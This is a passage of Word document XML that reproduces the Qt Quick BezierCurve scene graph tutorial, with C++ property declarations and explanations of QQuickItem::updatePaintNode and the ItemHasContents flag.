      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setP4</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setSegmentCount</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> count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signals</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> p1Changed</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> p2Changed</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> p3Changed</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> p4Changed</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> segmentCountChanged</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> count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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>private</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m_p1</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m_p2</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m_p3</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m_p4</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_segmentCount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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The item declaration </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclasses the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2120" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class and adds five properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. One for each of the four control points in the bezier curve and a parameter to control the number of segments the curve is subdivided into. For each of the properties we have corresponding getter and setter functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Since these properties can be bound to in QML, it is also preferable to have notifier signals for each of them so changes will be picked up the QML engine and used accordingly.</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QSGNode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updatePaintNode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QSGNode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UpdatePaintNodeData</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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>synchronization point</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML scene</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rendering scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virtual function</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2121" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which all items with custom scene graph logic </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must implement</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The scene graph will on many hardware configurations be rendering on a separate thread. It is therefore </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crucial that interaction with the scene graph happens in a controlled manner, first and foremost through the</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2122" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1799" w:name="beziercurve-implementation"/>
      <w:bookmarkStart w:id="1800" w:name="_Toc483000920"/>
      <w:bookmarkStart w:id="1801" w:name="_Toc483003911"/>
      <w:bookmarkStart w:id="1802" w:name="_Toc483604263"/>
      <w:bookmarkStart w:id="1803" w:name="_Toc483605483"/>
      <w:bookmarkEnd w:id="1799"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BezierCurve Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1800"/>
      <w:bookmarkEnd w:id="1801"/>
      <w:bookmarkEnd w:id="1802"/>
      <w:bookmarkEnd w:id="1803"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BezierCurve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BezierCurve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QQuickItem</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parent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QQuickItem</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parent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m_p1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</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m_p2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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m_p3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</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1</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m_p4</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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1</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m_segmentCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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setFlag</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ItemHasContents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true</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The BezierCurve constructor sets up default values for the control points and the number of segments. The bezier curve is specified in normalized coordinates relative to the item's bounding rectangle.</w:t>
      </w:r>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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The constructor also sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2123" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::ItemHasContents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flags tells the canvas that this item provides visual content and will call</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2124" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
